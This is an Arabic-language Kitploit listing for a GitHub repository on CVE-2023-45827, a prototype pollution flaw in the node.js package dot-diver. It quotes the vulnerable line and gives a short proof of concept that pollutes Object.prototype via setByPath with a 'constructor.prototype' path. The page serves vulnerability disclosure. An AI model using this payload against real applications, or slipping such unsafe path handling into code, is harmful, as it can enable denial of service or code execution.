Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-45827 — pp | Kitploit
أدوات/GitHubGitHub/200101whoami/cve-2023-45827
التحليل الثابتتحليل الثغرات الأمنيةتحليل الكودالاستغلالأمن الويب
GitHub200101whoami/cve-2023-45827

CVE-2023-45827

pp

عرض المستودع
5منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2023-45827

نظرة عامة على الثغرة

  • CVE-2023-45827

  • CVSS : 9.8

  • 3 نوفمبر 2023

  • ProtoType Pollution في حزمة node.js

  • جزء من مشروع rebob

شرح الثغرة

github advisories

هذه ثغرة من نوع تلوث النموذج الأولي (Prototype Pollution) في dot-diver. يمكن أن تؤدي إلى تنفيذ تعليمات برمجية عن بُعد (RCE).

الكود القابل للاستغلال

root@kitploit:~
//https://github.com/clickbar/dot-diver/tree/main/src/index.ts:277
//eslint-disable-next-line @typescript-eslint/no-unsafe-member-access
objectToSet[lastKey] = value

إثبات المفهوم (PoC)

root@kitploit:~
import { getByPath, setByPath } from '@clickbar/dot-diver'

console.log({}.polluted); // undefined
setByPath({},'constructor.prototype.polluted', 'foo');
console.log({}.polluted); // foo

إنها ثغرة من نوع تلوث النموذج الأولي (Prototype Pollution) ويمكن أن تؤدي إلى هجمات حرمان من الخدمة (DoS) وتنفيذ تعليمات برمجية عن بُعد (RCE) وغيرها.

target package

تنزيل الأداة